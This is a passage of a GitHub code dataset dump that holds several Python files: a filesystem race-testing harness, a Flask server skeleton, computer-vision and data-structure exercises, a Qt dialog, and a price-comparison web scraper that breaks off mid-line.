struct\nimport logging\nimport traceback\n\nfrom enum import Enum\nfrom argparse import ArgumentParser\n\nfrom fs import 
FSWorker\nfrom fs_ext4 import FS_CONFIGS_EXT4, FSWorker_EXT4\nfrom fs_btrfs import FS_CONFIGS_BTRFS, FSWorker_BTRFS\nfrom fs_xfs import FS_CONFIGS_XFS, FSWorker_XFS\nfrom emu import Emulator, create_emulator, attach_emulator\nfrom fuzz_exec import ExecResolver\nfrom dart_viz import VizRuntime\n\nfrom util import prepdn, touch, ascii_encode, enable_coloring_in_logging\n\nimport config\n\n\nclass TestID(Enum):\n PLAIN = 0\n\n\nclass TestCase(NamedTuple):\n tid: TestID\n args: Tuple[bytes, ...]\n\n def name(self) -> str:\n return '{}-{}'.format(self.tid.value, self.tid.name)\n\n def pack(self) -> bytes:\n meta = struct.pack('QQ', self.tid.value, len(self.args))\n data = b''.join(self.args)\n return meta + data\n\n\nTEST_CASES = [\n TestCase(TestID.PLAIN, ())\n]\n\n\nclass TestExec(object):\n\n def __init__(\n self, iseq: int, fswork: FSWorker, sample: str, fast: bool = False\n ) -> None:\n # basics\n self.iseq = iseq\n self.fswork = fswork\n self.sample = sample\n self.fast = fast\n\n def run_once(self, case: TestCase, seqn: Optional[int] = None) -> bool:\n logging.info('[{}] Running test case {}'.format(\n self.iseq, case.name() if seqn is None else '{} [{}]'.format(\n case.name(), seqn\n )\n ))\n\n base = os.path.join(config.TEST_RESULT_PATH, case.name())\n prepdn(base, override=True)\n\n with create_emulator(False) as emu:\n # pass the instance id via kernel boot parameters\n emu.boot_args.append('dart_instance={}'.format(self.iseq))\n\n # execute\n if self._run_execute(emu, base, case) and self.fast:\n return True\n\n # analyze\n runtime = self._run_analyze(emu, base)\n\n '''\n # keep running until error\n if runtime is None:\n return False\n\n return len(runtime.races) == 0\n '''\n\n # TODO (temporary code)\n # save unexpected states\n if runtime is None or len(runtime.races) != 0:\n repo = os.path.join(config.TEST_RESULT_PATH, 'rs')\n prepdn(repo)\n\n # copy files\n pdst = os.path.join(repo, str(seqn))\n shutil.copytree(base, pdst)\n\n # report\n if runtime is None:\n logging.error('Analysis failed: {}'.format(pdst))\n else:\n logging.warning('Data race detected: {}'.format(pdst))\n\n return True\n\n def run_rept(self, case: TestCase, repn: Optional[int] = None) -> None:\n i = 0\n while True:\n if not self.run_once(case, i):\n logging.warning('Test failed')\n break\n\n i += 1\n if repn is not None and i == repn:\n logging.info('All test runs passed')\n break\n\n def _run_execute(self, emu: Emulator, base: str, case: TestCase) -> bool:\n # copy over the image\n shutil.copy2(\n self.fswork.path_sample(self.sample),\n os.path.join(emu.session_tmp, config.VIRTEX_DISK_IMG_NAME)\n )\n\n # inputs\n with open(emu.session_shm, 'r+b') as f:\n # put the metadata\n f.seek(config.INSTMEM_OFFSET(\n self.iseq\n ) + config.INSTMEM_OFFSET_METADATA)\n\n f.write(struct.pack(\n '@c7sQ',\n ascii_encode('t'),\n ascii_encode('test'),\n 0,\n ))\n\n # put the mount options\n f.write(self.fswork.pack_mount())\n\n # put the test case info\n f.write(case.pack())\n\n # launch\n stdout, stderr = emu.launch()\n\n # outputs\n with open(emu.session_shm, 'rb') as f:\n # analyze the rtinfo\n f.seek(config.INSTMEM_OFFSET(\n self.iseq\n ) + config.INSTMEM_OFFSET_RTINFO)\n\n feedback = ExecResolver.process_wks(f)\n\n # save the results\n with open(os.path.join(base, 'stdout'), 'w') as t:\n t.write(stdout)\n\n with open(os.path.join(base, 'stderr'), 'w') as t:\n t.write(stderr)\n\n # result\n return feedback.has_proper_exit == 1\n\n def _run_analyze(self, emu: Emulator, base: str) -> Optional[VizRuntime]:\n ledger_src = 
os.path.join(emu.session_tmp, 'ledger')\n ledger_dst = os.path.join(base, 'ledger')\n\n # copy over the raw ledger (or copy from memory)\n if os.path.exists(ledger_src):\n shutil.copy2(ledger_src, ledger_dst)\n\n else:\n logging.warning('unable to find ledger on disk')\n\n # try to steal from memory\n with open(emu.session_shm, 'rb') as f:\n f.seek(config.IVSHMEM_OFFSET_HEADER +\n config.IVSHMEM_OFFSET_RESERVED)\n\n length = struct.unpack('Q', f.read(8))[0]\n resmax = \\\n config.IVSHMEM_OFFSET_INSTANCES - \\\n config.IVSHMEM_OFFSET_RESERVED\n\n # seek to the correct ledger instance\n cursor = 0\n while cursor < min(length, resmax):\n l_seq, l_cnt, l_len = \\\n struct.unpack('QQQ', f.read(24))\n\n cursor += 24\n if l_seq != self.iseq:\n cursor += l_len\n continue\n\n # migrate the ledger\n with open(ledger_dst, 'wb') as b:\n b.write(struct.pack('QQ', l_cnt, l_len))\n b.write(f.read(l_len))\n\n cursor = -1\n break\n\n # if no ledger found, there is nothing we can do\n if cursor != -1:\n logging.error('unable to find ledger in memory')\n return None\n\n # do the very expensive validation\n runtime = VizRuntime()\n console = os.path.join(base, 'console')\n failure = False\n\n try:\n runtime.process(ledger_dst)\n except Exception as ex:\n failure = True\n with open(os.path.join(console + '-error'), 'w') as t:\n t.write(str(ex))\n t.write('\\n-------- EXCEPTION --------\\n')\n traceback.print_tb(sys.exc_info()[2], file=t)\n\n # save the console output\n with open(console, 'w') as t:\n t.write('\\n'.join(runtime.records))\n\n # save the races\n runtime.dump_races(console + '-racer')\n\n # return the runtime states\n return None if failure else runtime\n\n\nclass TestRunner(object):\n\n def __init__(self, fswork: FSWorker, sample: str, override: bool) -> None:\n # basic\n self.fswork = fswork\n self.sample = sample\n\n # prepare paths\n prepdn(config.TEST_RESULT_PATH, override=override)\n\n def run(\n self,\n cases: List[TestCase],\n repn: Optional[int] = None,\n fast: bool = False\n ) -> None:\n # initialize the shared stuff\n with attach_emulator() as emulator:\n # create an empty ivshmem file\n if os.path.exists(emulator.session_shm):\n os.unlink(emulator.session_shm)\n\n touch(emulator.session_shm, config.IVSHMEM_SIZE)\n\n # run the workers\n worker = TestExec(0, self.fswork, self.sample, fast)\n for case in cases:\n worker.run_rept(case, repn)\n\n\ndef main(argv: List[str]) -> int:\n # setup argument parser\n parser = ArgumentParser()\n\n # logging configs\n parser.add_argument(\n '-v', '--verbose', action='count', default=1,\n help='Verbosity level, can be specified multiple times, default to 1',\n )\n\n # override flag\n parser.add_argument(\n '-c', '--clean', action='store_true',\n help='Clean existing files',\n )\n\n # tag selection\n parser.add_argument(\n '-t', '--tag', default='000',\n help='Tag of the filesystem configuration (default to 000)',\n )\n\n # img selection\n parser.add_argument(\n '-i', '--img', default='empty',\n help='Filesystem image (default to empty)',\n )\n\n # test selection\n parser.add_argument(\n '-s', '--select', action='append', default=None,\n help='Test case selection'\n )\n\n # nrun mode\n parser.add_argument(\n '-n', '--num', type=int, default=None,\n help='Number of runs'\n )\n\n # fast mode\n parser.add_argument(\n '-f', '--fast', action='store_true',\n help='Fast mode (do not analyze on proper exit)'\n )\n\n subs = parser.add_subparsers(dest='cmd')\n subs.add_parser(\n 'test',\n help='Test execution',\n )\n\n # parse\n args = parser.parse_args(argv)\n\n 
# prepare logs\n enable_coloring_in_logging()\n logging.basicConfig(\n format='%(asctime)s %(levelname)s %(message)s',\n level=logging.WARNING - (logging.DEBUG - logging.NOTSET) * args.verbose\n )\n\n # prepare options\n cmd = args.cmd\n config.OPTION().action = '-'.join(['exec', cmd])\n\n # construct the filesystem instance\n fswork = None # type: Optional[FSWorker]\n\n fsname = config.OPTION().flavor\n if fsname == 'ext4':\n fswork = FSWorker_EXT4(FS_CONFIGS_EXT4[args.tag])\n\n elif fsname == 'btrfs':\n fswork = FSWorker_BTRFS(FS_CONFIGS_BTRFS[args.tag])\n\n elif fsname == 'xfs':\n fswork = FSWorker_XFS(FS_CONFIGS_XFS[args.tag])\n\n else:\n logging.error('Invalid filesystem: {}'.format(fsname))\n parser.print_help()\n return -1\n\n # filter test cases\n choices = set() # type: Set[TestCase]\n if args.select is None:\n choices.update(TEST_CASES)\n else:\n for pattern in args.select:\n matcher = re.compile(pattern)\n for case in TEST_CASES:\n if matcher.match(case.tid.name) is not None:\n choices.add(case)\n\n # sort the cases\n cases = sorted(choices, key=lambda i: i.tid)\n logging.info('Test cases selected: {}'.format(len(cases)))\n\n # choose action\n if cmd == 'test':\n runner = TestRunner(fswork, args.img, args.clean)\n runner.run(cases, args.num, args.fast)\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"sslab-gatech/krace","sub_path":"script/exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":10652,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"44"} +{"seq_id":"37949958738","text":"##생성자정의\n##객체생성시, 무조건 자동으로 호출\n##생성자는 함수\n##이름이 정해져 있음:Dog__init__\n##2개 이상의 생성자를 정의xxx\n##생성자를 명시하지 않으면\n## 매개변수가 없는 하는일이 없는\n## 생성자를 자동으로 추가\n # __init__(self):\n # pass\n\n##생성자는 객체를 생성할때 자동으로 변수값을 할당을 원할때 사용\n\nimport sys\nimport io\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\nclass Service:\n secret=\"영구는 배꼽이 두개다\"\n def __init__(self,name):\n self.name=name\n\n def setname(self,name):\n self.name = name\n\n def sum(self,a,b):\n result= a+b\n print('%s님 %s +%s =%s입니다.:'%(self.name,a,b,result))\n\n\npey=Service('홍길동1')\n#pey.setname('홍길동2')\npey.sum(1,1)\n","repo_name":"jushik91/python-basic","sub_path":"7/book_177_3.py","file_name":"book_177_3.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35104441943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nRemote Exploit.\n\nMain server file.\n\"\"\"\nimport builtins\nfrom io import FileIO\nimport logging\nimport os\nimport sys\nfrom types import FunctionType\nfrom typing import Any, TextIO\n\nimport colorama\nimport coloredlogs\nfrom flask import Flask\nimport verboselogs\n\nfrom .controllers.main import main\nfrom .controllers.list import list\nfrom .http.static import public, ui\n\ncolorama.init(autoreset=True)\n\ncoloredlogs.install(\n verboselogs.SPAM,\n fmt=colorama.Fore.MAGENTA\n + \"%(processName)s#%(threadName)s\"\n + colorama.Fore.CYAN\n + \" At %(pathname)s:%(lineno)d, in %(funcName)s\\n\"\n + colorama.Style.RESET_ALL\n + \"[ %(name)s ] %(asctime)s: %(levelname)s %(message)s\",\n)\n\n\ndef logging_print(\n *objects: Any,\n sep: str = \" \",\n end: str = \"\",\n file: TextIO = sys.stdout,\n flush: bool = False\n) -> None:\n \"\"\"\n A custom print function using logging.\n\n :param sep: Separator between objects, 
defaults to \" \"\n :type sep: str, optional\n :param end: End character, logging as default \\n, defaults to \"\"\n :type end: str, optional\n :param file: Another file to write output to, defaults to sys.stdout\n :type file: TextIO, optional\n :param flush: Wether to flush output file or not, defaults to False\n :type flush: bool, optional\n \"\"\"\n string: str = \"\"\n for index in range(len(objects) - 1):\n string += str(objects[index]) + sep\n string += str(objects[-1]) + end\n logging.info(string)\n if file is not sys.stdout:\n file.write(string)\n if flush:\n file.flush()\n\n\n_print: FunctionType = print\nbuiltins.print = lambda *args, **kwargs: logging_print(*args, **kwargs)\n\nprint(\"hey\")\n\nserver: Flask = Flask(__name__)\n\"\"\"The main Flask server.\"\"\"\n\nserver.template_folder = os.path.abspath(\"app/views\")\n\n# HTTP Static\nserver.add_url_rule(\"/public/\", view_func=public)\nserver.add_url_rule(\"/ui/\", view_func=ui)\n\nserver.add_url_rule(\"/list\", view_func=list)\n\nif __name__ == \"__main__\":\n server.run(host=\"0.0.0.0\", port=8080, debug=True)\n","repo_name":"Virinas-code/remote-exploit","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36509119510","text":"'''\n @FileName:MediaPipe.py\n @Author:yikai yang\n @Date:2023/2/13\n @Desc:Null\n'''\n\nimport mediapipe as mp\n\n\"\"\"\n This is mediapiepe model to detect hands\n \n :argument null\n :return null\n\"\"\"\n\n\nclass MediaPipe():\n def __init__(self):\n self.mp_hands = mp.solutions.hands\n self.hands = self.mp_hands.Hands(static_image_mode=False,\n max_num_hands=2,\n min_detection_confidence=0.05,\n min_tracking_confidence=0.2)\n","repo_name":"big97kai/FingerDetect","sub_path":"Functions/MediaPipe.py","file_name":"MediaPipe.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14567349117","text":"# import your necessary packages\nimport cv2\nimport imutils\nimport argparse\n\n# construct an argparser and parse your arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", default=\"car.jpeg\", help=\"Path to input image\")\nargs = vars(ap.parse_args())\n\n# load the image and display on it on the screen\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original\", image)\n\n# grab the spatial dimentions of the image\n(h, w) = image.shape[:2]\n\n# NB Mainiting Aspect Ratio and when resizing images\n\n# Let's resize our image to 150 pixels wide but in order to \n# prevent our image from being skewed/distorted, we must first\n# calculate the ratio of the new width to the old width\nr = 150.0 / w\ndim = (150, int(h * r))\n\n# perform the actual resize\nresize = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\ncv2.imshow(\"150w resized\", resize)\n\n# let's the resize the image with height 50pixels again keeping \n# the aspect ration\nr = 50.0 / h\ndim = (int(w * r), 50)\n\n# perform the actual resize\nresize = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\ncv2.imshow(\"50 resized\", resize)\ncv2.waitKey(0)\n\n# resizing with imutils\nresize = imutils.resize(image=image, width=100)\ncv2.imshow(\"imutils\", resize)\ncv2.waitKey(0)\n\n# construct a list of interpolation methods in OPENCV\nmethods = [\n (\"cv2.INTER_AREA\", cv2.INTER_AREA),\n (\"cv2.INTER_LINEAR\", cv2.INTER_LINEAR),\n (\"cv2.INTER_NEAREST\", 
cv2.INTER_NEAREST),\n (\"cv2.INTER_CUBIC\", cv2.INTER_CUBIC),\n (\"cv2.INTER_LANCZOS4\", cv2.INTER_LANCZOS4)\n]\n\n# loop over the interpolation methods\nfor (name, method) in methods:\n # resize the width of the image 3x with the current interpolation method\n print(f\"[INFO] {name}\")\n \n resize = imutils.resize(image=image, width=w * 3, inter=method)\n \n cv2.imshow(f\"{name}\", resize)\n cv2.waitKey(0)","repo_name":"bis29abena/Image-Processing","sub_path":"Opencv/resizing/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39032097404","text":"\"\"\"\nDesign a stack that supports push, pop, top, and retrieving the minimum element in constant time.\n\npush(x) -- Push element x onto stack.\npop() -- Removes the element on top of the stack.\ntop() -- Get the top element.\ngetMin() -- Retrieve the minimum element in the stack.\nExample:\nMinStack minStack = new MinStack();\nminStack.push(-2);\nminStack.push(0);\nminStack.push(-3);\nminStack.getMin(); --> Returns -3.\nminStack.pop();\nminStack.top(); --> Returns 0.\nminStack.getMin(); --> Returns -2.\n\n\nyoutube: https://www.youtube.com/watch?v=nGwn8_-6e7w\n\n\"\"\"\nclass MinStack(object):\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self._items = []\n \n\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: None\n \"\"\"\n current_min = self.getMin()\n print('current_min:', current_min)\n if current_min is None or x < current_min:\n current_min = x\n self._items.append((x,current_min)) \n \n\n def pop(self):\n \"\"\"\n :rtype: None\n \"\"\"\n self._items.pop()\n \n\n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if len(self._items)==0:\n return None\n else:\n return self._items[-1][0]\n \n\n def getMin(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if len(self._items)==0:\n return None\n else:\n return self._items[-1][1]\n\n \nobj=MinStack()\nobj.push(-10)\nobj.push(14)\nprint(obj.getMin())\nprint(obj.getMin())\nobj.push(-20)\nprint(obj.getMin())\nprint(obj.getMin())\nobj.top()\nprint(obj.getMin())\nobj.pop()\nobj.push(10)\nobj.push(-7)\nprint(obj.getMin())\nobj.push(-7)\nobj.pop()\nobj.top()\nprint(obj.getMin())\nobj.pop()","repo_name":"SanazME/Algorithm-DataStructure","sub_path":"array_stack_queues/Min_stack.py","file_name":"Min_stack.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2564577016","text":"import PySide6.QtWidgets as qtw\nfrom PySide6.QtCore import Qt as qt\n\nfrom src.widgets.QDialog.QDialog import Dialog\n\nfrom src.profileManager import ProfileManager\nfrom src.constant_vars import PROFILES_JSON\n\nclass SelectProfile(Dialog):\n\n profile: str = None\n\n def __init__(self, profilePath: str = PROFILES_JSON) -> None:\n super().__init__()\n\n self.setWindowTitle('Profile to copy mod(s) to:')\n\n layout = qtw.QVBoxLayout()\n\n self.profileList = qtw.QListWidget(self)\n self.profileList.setHorizontalScrollBarPolicy(qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n self.profileList.setFocusPolicy(qt.FocusPolicy.NoFocus)\n self.profileList.setSelectionMode(qtw.QListWidget.SelectionMode.SingleSelection)\n\n self.searchBar = qtw.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textChanged.connect(lambda x: self.search(x))\n\n profileManager = ProfileManager(profilePath)\n\n buttons = qtw.QDialogButtonBox.StandardButton.Ok | 
qtw.QDialogButtonBox.StandardButton.Cancel\n\n self.buttonBox = qtw.QDialogButtonBox(buttons)\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n self.profileList.addItems(list(profileManager.getJSON().keys()))\n\n for widget in (self.searchBar, self.profileList, self.buttonBox):\n layout.addWidget(widget)\n \n self.setLayout(layout)\n \n def search(self, input: str) -> None:\n\n results = self.profileList.findItems(f'{input}*', qt.MatchFlag.MatchWildcard | qt.MatchFlag.MatchExactly)\n\n for i in range(0, self.profileList.count() + 1):\n\n item = self.profileList.item(i)\n\n if item not in results:\n self.profileList.setRowHidden(i, True)\n else:\n self.profileList.setRowHidden(i, False)\n \n def accept(self) -> None:\n\n self.setResult(1)\n\n try:\n self.profile = self.profileList.selectedItems()[0].text()\n except IndexError:\n pass\n\n return super().accept()\n \n def reject(self) -> None:\n self.setResult(0)\n return super().reject()\n","repo_name":"Wolfmyths/Myth-Mod-Manager","sub_path":"src/widgets/QDialog/profileSelectionQDialog.py","file_name":"profileSelectionQDialog.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"2775567164","text":"import datetime\nimport json\nfrom bs4 import BeautifulSoup\nimport re\nimport requests\n\n\ndef process_website_content(website,content,items_amount_old, website_content_listbox,progress_callback,edit_back_page,stop_scan,debug,stop_flag,redirect):\n global back_page_index,back_page\n debug.d_print(\"Identifying the website\")\n \n if \"hinta.fi\" in website:\n debug.d_print(\"Hinta.fi identified\")\n entry, entry_xl, items_amount_old, columns = hinta_process_website_content(website,content,items_amount_old, website_content_listbox,progress_callback,stop_flag,stop_scan,debug)\n elif \"hintaopas.fi\":\n debug.d_print(\"Hintaopas.fi identified\")\n entry, entry_xl, items_amount_old, columns = hintaopas_process_website_content(website,content,items_amount_old, website_content_listbox,progress_callback,stop_flag,stop_scan,debug)\n if redirect == False:\n edit_back_page(website)\n \n return entry, entry_xl, items_amount_old, columns\n\ndef hinta_process_website_content(website,content,items_amount_old, website_content_listbox,progress_callback,stop_flag,stop_scan,debug):\n\n items_amount = 0\n entry_xl = []\n soup = BeautifulSoup(content, 'html.parser')\n script_tags = soup.find_all('script', type='application/ld+json')\n\n if \"hinta.fi/g\" in website:\n debug.d_print(\"Scanning category list (/g)\")\n\n total_items_element = soup.find('span', class_='hv-text-strong')\n if total_items_element:\n total_items = int(total_items_element.text.replace(',', '.').replace(' ', ''))\n else:\n total_items = 15 # Failback\n debug.d_print(f\"The amount of expected elements is {total_items_element}\")\n\n items_amount = 0\n actual_items_amount = 0\n page_number = 1\n scan = True\n\n while scan:\n try:\n\n if stop_scan():\n scan = False\n debug.d_print(\"Received stop_scan, perfoming last scan\")\n skipped_items = 0\n if items_amount == total_items:\n debug.d_print(f\"Exiting job in total_amount({items_amount} == {total_items})\")\n items_amount = actual_items_amount\n break\n if stop_flag:\n if page_number == stop_flag+1:\n debug.d_print(f\"Exiting job on stop_flag({page_number} == {stop_flag+1})\")\n progress_callback(total_items,total_items)\n items_amount = actual_items_amount\n break \n debug.d_print(f\"Trying to 
get page {page_number}: {website}?l=1&p={page_number}\",\"-->\",True)\n response = requests.get(f\"{website}?l=1&p={page_number}\", timeout=5)\n debug.d_print(f\"Got response {response.status_code}\",\"\\n\",False)\n if response.status_code == 200:\n soup = BeautifulSoup(response.content, 'html.parser')\n product_rows = soup.find_all('tr', class_='hvjs-product-row')\n\n for row in product_rows:\n product_name_tag = row.find('strong', class_='hv--name')\n product_name = product_name_tag.get_text() if product_name_tag else \"Unknown Product\"\n link_tag = row.find('a', href=True)\n category_link = link_tag['href'] if link_tag else \"Unknown Link\"\n price_tag = row.find('td', class_='hv--price')\n price = price_tag.a.get_text() if price_tag else \"Unknown Price\"\n\n currency = price[-1] if not price[-1].isdigit() else \"Unknown Currency\"\n price = price.replace(',', '.').replace(' ', '')[:-1] if currency != \"Unknown Currency\" else price\n\n if (f\"'https://hinta.fi{category_link}'\") in str(entry_xl):\n skipped_items += 1\n else:\n entry_xl.append((product_name, price, currency, f\"https://hinta.fi{category_link}\"))\n actual_items_amount += 1\n items_amount += 1\n if stop_flag:\n progress_callback(page_number,stop_flag)\n else:\n progress_callback(items_amount,total_items)\n if skipped_items != 0:\n debug.warning_print(f\"Just skipped {skipped_items} items\",\"W\")\n debug.d_print(f\"Progress - > {items_amount}(actual {actual_items_amount}) out of {total_items}\")\n \n page_number += 1\n\n except requests.RequestException:\n debug.warning_print(\"Failed to fetch content after 5 seconds of trying\",\"E\")\n break\n\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n items_amount_old = items_amount\n columns = (\"Item\", \"Price\", \"Currency\", \"Link\")\n return entry, entry_xl, items_amount_old, columns\n elif re.match(r'https://hinta\\.fi/\\d+/.*', website):\n debug.d_print(\"Scanning product list (\\d+/.*)\")\n progress_callback(0,1)\n\n for script in script_tags:\n try:\n product_data = json.loads(script.string)\n if \"@type\" in product_data and product_data[\"@type\"] == \"Product\":\n product_name = product_data[\"name\"] if \"name\" in product_data else \"Unknown Product\"\n \n if \"offers\" in product_data:\n if \"@type\" in product_data[\"offers\"] and product_data[\"offers\"][\"@type\"] == \"AggregateOffer\":\n offers = product_data[\"offers\"].get(\"offers\", [])\n else:\n offers = [product_data[\"offers\"]]\n for offer in offers:\n offer_name = offer.get(\"name\", \"Unknown Offer\")\n price = offer.get(\"price\", \"Unknown Price\")\n currency = offer.get(\"priceCurrency\", \"EUR\")\n seller_name = offer.get(\"seller\", {}).get(\"name\", \"Unknown Seller\")\n\n entry = f\"Item: {product_name} Offer: {offer_name} Price: {price} {currency} Seller: {seller_name}\"\n entry_xl.append((offer_name, seller_name , price, currency))\n items_amount += 1\n except json.JSONDecodeError as e:\n debug.warning_print(\"JSON Decode Error:\",\"W\")\n debug.warning_print(f\"{e}\",\"E\")\n pass # Skip this script if it's not valid JSON\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n items_amount_old = items_amount\n columns = (\"Item\",\"Seller\",\"Price\",\"Currency\",\"Link\")\n progress_callback(1,1)\n return entry, entry_xl, 
items_amount_old, columns\n elif \"hinta.fi\" in website:\n progress_callback(0,1)\n debug.d_print(\"Scanning main page\")\n category_links = soup.find_all('a', class_='hv-menu-i-a')\n entry_xl = []\n\n for link in category_links:\n category_name = link.text\n category_link = link['href']\n \n # Check if the link contains unwanted patterns, skip if it does\n if \"hv-store-logo-w\" in link.parent.attrs.get(\"class\", []) or \"kauppaan.php\" in category_link:\n continue\n \n # Replace spaces with an underscore\n category_name_fixed = \" \".join(category_name.split())\n \n entry_xl.append((category_name_fixed, \"https://hinta.fi\" + category_link))\n items_amount += 1\n\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n \n items_amount_old = items_amount\n items_amount = len(entry_xl)\n columns = (\"Category\", \"Link\")\n progress_callback(1,1)\n return entry, entry_xl, items_amount_old, columns\n\ndef hintaopas_process_website_content(website, content, items_amount_old, website_content_listbox, progress_callback, stop_flag, stop_scan, debug):\n items_amount = 0\n entry_xl = []\n soup = BeautifulSoup(content, 'html.parser')\n script_tags = soup.find_all('script', type='application/ld+json')\n \n if re.match(r'^https://hintaopas\\.fi/product\\.php\\?p=\\d+$',website):\n debug.d_print(\"Scanning product list\")\n progress_callback(0,1)\n anchor_tags = soup.find_all('a', class_='ExternalLink-sc-1ap2oa8-2')\n for tag in anchor_tags:\n try:\n store = tag.find('span', class_='StoreInfoTitle-sc-bc2k22-1').text.strip()\n item = tag.find('span', class_='StyledProductName-sc-1v7pabx-2').text.strip()\n price = tag.find('h4', class_='PriceLabel-sc-lboeq9-0').text.strip()\n price = float(re.sub(\"[^0-9,.]\", \"\", price).replace(',', '.'))\n link = tag['href']\n rating_container = tag.find('div', class_='RatingContainer-sc-u1xymf-0')\n rating = rating_container['data-rating'] if rating_container else 'N/A'\n entry_xl.append((store,rating,item,price,link))\n items_amount += 1\n except:\n pass\n items_amount_old = items_amount\n columns = (\"Store\",\"Store's Rating\",\"Item\", \"Price\", \"Link\")\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n progress_callback(1,1)\n return entry, entry_xl, items_amount_old, columns\n elif re.match(r'^https://hintaopas\\.fi/c/[^?]+\\?brand=\\d+$', website):\n debug.d_print(\"Scanning brand list\")\n debug.d_print(\"Trying to get data using the the first way\")\n progress_callback(0,1)\n table_rows = soup.find_all('tr', class_='Tr-sc-1stvbsu-2 chMRiA')\n for row in table_rows:\n product_link = row.find('a', class_='InternalLink-sc-1ap2oa8-1')\n item = product_link.find('h3', class_='ProductNameTable-sc-1stvbsu-3').text.strip()\n price_element = row.find('span', class_='PriceLabel-sc-lboeq9-0')\n price = price_element.text.strip()\n price = float(re.sub(\"[^0-9,.]\", \"\", price).replace(',', '.'))\n link = product_link['href']\n entry_xl.append((item,price, \"https://hintaopas.fi\" + link))\n items_amount += 1\n if items_amount == 0:\n debug.warning_print(\"Got 0 items from the first scan, perfoming product scan instead\",\"W\")\n list_items = soup.find_all('li', attrs={'data-test': 'ProductGridCard'})\n for item in list_items:\n try:\n product_link = item.find('a', class_='InternalLink-sc-1ap2oa8-1')\n name = 
product_link.find('span', class_='Text--j47ncs khWbVp titlesmalltext').text.strip()\n price_element = item.find('span', class_='Text--j47ncs iolWON')\n price = price_element.text.strip()\n price = float(re.sub(\"[^0-9,.]\", \"\", price).replace(',', '.'))\n link = product_link['href']\n entry_xl.append((name,price, \"https://hintaopas.fi\" + link))\n items_amount += 1\n except:\n pass\n\n items_amount_old = items_amount\n columns = (\"Item\", \"Price\", \"Link\")\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n progress_callback(1,1)\n return entry, entry_xl, items_amount_old, columns\n elif re.match(r'https://hintaopas\\.fi/c/.*', website):\n debug.d_print(\"Scanning category list\")\n progress_callback(0,1)\n entry_data = soup.find_all('li', style='flex:0 0 110px')\n\n for data in entry_data:\n link_element = data.find('a', class_='InternalLink-sc-1ap2oa8-1')\n name_element = data.find('span', class_='Text--j47ncs gEcihA titlesmalltext')\n if link_element and name_element:\n item = name_element.text.strip()\n link = link_element['href']\n entry_xl.append((item,\"https://hintaopas.fi\" + link))\n items_amount += 1\n columns = (\"Category\",\"Link\")\n\n if items_amount == 0:\n debug.warning_print(\"Got 0 items from the first scan, perfoming item scan instead\",\"W\")\n entry_data = soup.find_all('tr', class_='Tr-sc-1stvbsu-2 chMRiA')\n for data in entry_data:\n item = data.find('h3', class_='ProductNameTable-sc-1stvbsu-3').text.strip()\n price_element = data.find('span', class_='PriceLabel-sc-lboeq9-0')\n price = price_element.text.strip() if price_element else \"\"\n price = float(re.sub(\"[^0-9,]\", \"\", price).replace(',', '.'))\n link_element = data.find('a', class_='InternalLink-sc-1ap2oa8-1')\n link = link_element['href'] if link_element else \"\"\n entry_xl.append((item,price,\"https://hintaopas.fi\" + link))\n items_amount += 1\n columns = list(columns)\n columns.clear()\n columns = (\"Category\",\"Price\",\"Link\")\n if items_amount == 0:\n debug.warning_print(\"Got 0 items from the second scan, perfoming another item scan\",\"W\")\n entry_data = soup.find_all('li', class_='OffersGridItem-sc-812954-1 kNYiDB')\n for data in entry_data:\n item = data.find('span', class_='Text--j47ncs khWbVp titlesmalltext').text.strip()\n price_element = data.find('span', class_='Text--j47ncs iolWON')\n price = price_element.text.strip() if price_element else \"\"\n price = float(re.sub(\"[^0-9,]\", \"\", price).replace(',', '.'))\n link_element = data.find('a', class_='InternalLink-sc-1ap2oa8-1')\n link = link_element['href'] if link_element else \"\"\n entry_xl.append((item,price,\"https://hintaopas.fi\" + link))\n items_amount += 1\n columns = 